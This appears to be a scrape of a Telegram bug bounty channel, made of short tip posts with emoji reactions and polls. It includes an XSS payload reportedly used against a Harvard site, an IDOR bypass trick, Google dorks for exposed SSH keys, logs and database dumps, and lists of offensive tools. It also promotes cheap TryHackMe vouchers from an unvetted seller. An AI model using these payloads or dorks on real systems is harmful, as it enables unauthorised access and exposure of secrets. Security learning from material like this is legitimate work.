XSS in @Harvard
Payload: lookhere’);}</script><img src=x onerror=alert(“XSS”)>
1)the keyword “lookhere” was used to detect all the place the input was reflected
2)The rest is responsible for balancing the payload
#infosec #bugbountytips #xss
Payload: lookhere’);}</script><img src=x onerror=alert(“XSS”)>
1)the keyword “lookhere” was used to detect all the place the input was reflected
2)The rest is responsible for balancing the payload
#infosec #bugbountytips #xss
👍13🔥6❤4
Search for all leaked keys/secrets using one regex! 😮
regex: gist.github.com/h4x0r-dz/be69c…
#BugBounty #bugbountytip
regex: gist.github.com/h4x0r-dz/be69c…
#BugBounty #bugbountytip
😱8👍4❤1
As I said
Those who wanted to purchase Tryhackme voucher at very cheap price 👇
💥 Can contact This seller @Infosec_lover
🏷️ Seller [ Verified By Me ] :
Price : Rs 146/- or 1.82$ for 1 month voucher.
You can also purchase 2 month or more according to the your need
It's for today only
Those who wanted to purchase Tryhackme voucher at very cheap price 👇
💥 Can contact This seller @Infosec_lover
🏷️ Seller [ Verified By Me ] :
Price : Rs 146/- or 1.82$ for 1 month voucher.
You can also purchase 2 month or more according to the your need
It's for today only
👍7❤3👏1
find more IDOR 🧙♀️
Don’t just replace ID
/account/1234 --> Forbidden
Bypass by appending %20, %09, %0b, %0c, %1c, %1d, %1e, %1f, /
#BugBounty #bugbountytip #bugbountytips
Don’t just replace ID
/account/1234 --> Forbidden
Bypass by appending %20, %09, %0b, %0c, %1c, %1d, %1e, %1f, /
#BugBounty #bugbountytip #bugbountytips
👍25⚡2😱2🤩1😈1
nuclei in normal Undesirable due to too many duplicate in reports 😮
80% use this method in nuclei
collect all subdomains
filter to live
run nuclei
==> lot of duplicates
here the tip how can use its and get valid bugs
#BugBounty #bugbountytip #bugbountytips
===>
80% use this method in nuclei
collect all subdomains
filter to live
run nuclei
==> lot of duplicates
here the tip how can use its and get valid bugs
#BugBounty #bugbountytip #bugbountytips
===>
🔥10❤2👍1👌1🤡1
Bug Bounty
Today's Motivation 🤗
Guys how's the above Post 🤩
Should I Post daily 1 motivational Post For you Guys
Should I Post daily 1 motivational Post For you Guys
Anonymous Poll
85%
Yes
15%
No
👍1
fastbugbounty💥
Automate enumeration tool 🔥
Usage
./run.sh target.com
Link : https://github.com/kursadalsan/fastbugbounty
Automate enumeration tool 🔥
Usage
./run.sh target.com
Link : https://github.com/kursadalsan/fastbugbounty
👍14❤2👏1
Bug Bounty pinned «As I said Those who wanted to purchase Tryhackme voucher at very cheap price 👇 💥 Can contact This seller @Infosec_lover 🏷️ Seller [ Verified By Me ] : Price : Rs 146/- or 1.82$ for 1 month voucher. You can also purchase 2 month or more according to the…»
💥Essential Penetration Testing Tools
• Burpsuite
• Metasploit
• Powershell-Suite
• nmap
• Wireshark
• Mimikazt
• Hashcat
• John the Ripper
• Hydra
• Aircrack-ng
• Fuzzdb
• gobuster
• Acunetix
• Nessus
• Cobalt Strike
#cybersecurity #infosec
• Burpsuite
• Metasploit
• Powershell-Suite
• nmap
• Wireshark
• Mimikazt
• Hashcat
• John the Ripper
• Hydra
• Aircrack-ng
• Fuzzdb
• gobuster
• Acunetix
• Nessus
• Cobalt Strike
#cybersecurity #infosec
🔥9👍6❤4🐳2🤨1
🎉 Google Dorks for Bug Bounty
1-allintext:username filetype:log
2-inurl:/proc/self/cwd
3-intitle:"index of" inurl:ftp
4-filetype:log username putty
5-filetype:xls inurl:"email.xls"
6-intitle:index.of id_rsa -id_rsa.pub
7-"index of" "database.sql.zip"
8-intitle:"Index of" wp-admin
9-intitle:"Apache2 Ubuntu Default Page: It works"
10-"Index of" inurl:phpmyadmin
11-inurl:Dashboard.jspa intext:"Atlassian Jira Project Management Software"
12-inurl:app/kibana intext:Loading Kibana
13-inurl:_cpanel/forgotpwd
14-allintitle: restricted filetype:doc site:gov
#bugbountytips
1-allintext:username filetype:log
2-inurl:/proc/self/cwd
3-intitle:"index of" inurl:ftp
4-filetype:log username putty
5-filetype:xls inurl:"email.xls"
6-intitle:index.of id_rsa -id_rsa.pub
7-"index of" "database.sql.zip"
8-intitle:"Index of" wp-admin
9-intitle:"Apache2 Ubuntu Default Page: It works"
10-"Index of" inurl:phpmyadmin
11-inurl:Dashboard.jspa intext:"Atlassian Jira Project Management Software"
12-inurl:app/kibana intext:Loading Kibana
13-inurl:_cpanel/forgotpwd
14-allintitle: restricted filetype:doc site:gov
#bugbountytips
👍15🔥5❤3🥰2⚡1
✨What do you prefer In any Educational/Tutorial Video ? 👇
Anonymous Poll
43%
Low Lofi / Soft Music in Background
57%
No Music at All. Just Speak
🤔3🥰1🐳1🤨1
☃️Red Teaming Pentest Checklist☃️
➡️ Windows Privilege Escalation
➡️ Lateral Movement
➡️ Domain Persistence
and much more...
🔗 Link: https://github.com/netbiosX/Checklists
#bugbounty #infosec #hacking #cybersecurity
➡️ Windows Privilege Escalation
➡️ Lateral Movement
➡️ Domain Persistence
and much more...
🔗 Link: https://github.com/netbiosX/Checklists
#bugbounty #infosec #hacking #cybersecurity
👍5🔥4🥰1😱1
🌟Offensive Recon for Bug Bounty Hunters
• By
@harshbothra_
• PPT : https://speakerdeck.com/harshbothra/offensive-recon-for-bug-bounty-hunters
#bugbounty #infosec #cybersecurity
• By
@harshbothra_
• PPT : https://speakerdeck.com/harshbothra/offensive-recon-for-bug-bounty-hunters
#bugbounty #infosec #cybersecurity
🔥4😍2👏1
💥FREE labs to practice mobile app pentesting 👇🏻
>. https://code.google.com/archive/p/dvaa/
>. https://github.com/prateek147/DVIA-v2
>. https://securitycompass.github.io/iPhoneLabs/
>. https://code.google.com/archive/p/owasp-igoat/
>. https://maddiestone.github.io/AndroidAppRE/
>. https://ctf.hpandro.raviramesh.info/
#bugbounty #infosec #hacking #cybersecurity #bugbountytips h
>. https://code.google.com/archive/p/dvaa/
>. https://github.com/prateek147/DVIA-v2
>. https://securitycompass.github.io/iPhoneLabs/
>. https://code.google.com/archive/p/owasp-igoat/
>. https://maddiestone.github.io/AndroidAppRE/
>. https://ctf.hpandro.raviramesh.info/
#bugbounty #infosec #hacking #cybersecurity #bugbountytips h
👍8🥰3👏1
Mostly Use 🔍 Engine By Hacker
1. Fofa.so
2. Wigle.net
3. Hunter.io
4. Shodan.io
5. Onyphe.io
6. Zoomeye.org
7. Ghostproject.fr
8. App.binaryedge.io
9. Viz.Greynoise.io/table
1. Fofa.so
2. Wigle.net
3. Hunter.io
4. Shodan.io
5. Onyphe.io
6. Zoomeye.org
7. Ghostproject.fr
8. App.binaryedge.io
9. Viz.Greynoise.io/table
👨💻8🔥5👍2